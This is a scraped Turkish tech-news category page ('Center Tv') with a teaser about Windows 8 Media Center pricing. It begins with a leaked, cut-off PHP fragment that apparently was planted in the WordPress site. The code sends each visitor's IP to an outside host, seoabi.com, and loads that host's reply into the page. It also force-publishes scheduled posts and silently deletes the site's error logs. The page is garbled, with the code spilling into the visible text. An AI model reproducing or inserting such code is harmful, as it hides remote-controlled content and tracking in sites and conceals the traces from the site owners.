$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> Center Tv | Teknoloji Haberleri

Center Tv kategorisindeki tüm yazılar

Son Yazılar

Onun da fiyatı sızdı…

Windows 8’in içinde dahili olarak yer almayacak eski göz ağrımıza kavuşmak için ne kadar ödeyeceğiz? Avrupa Birliği’nin kararlarıyla başı belada olan Microsoft bilindiği gibi Media Center’ı da Windows 7’nin dışına almıştı. Windows 8’de bu karar tüm dünyaya taşındı.  Gerek fiyatları aşağıda tutmak, gerekse ülkelerle kötü olmamak için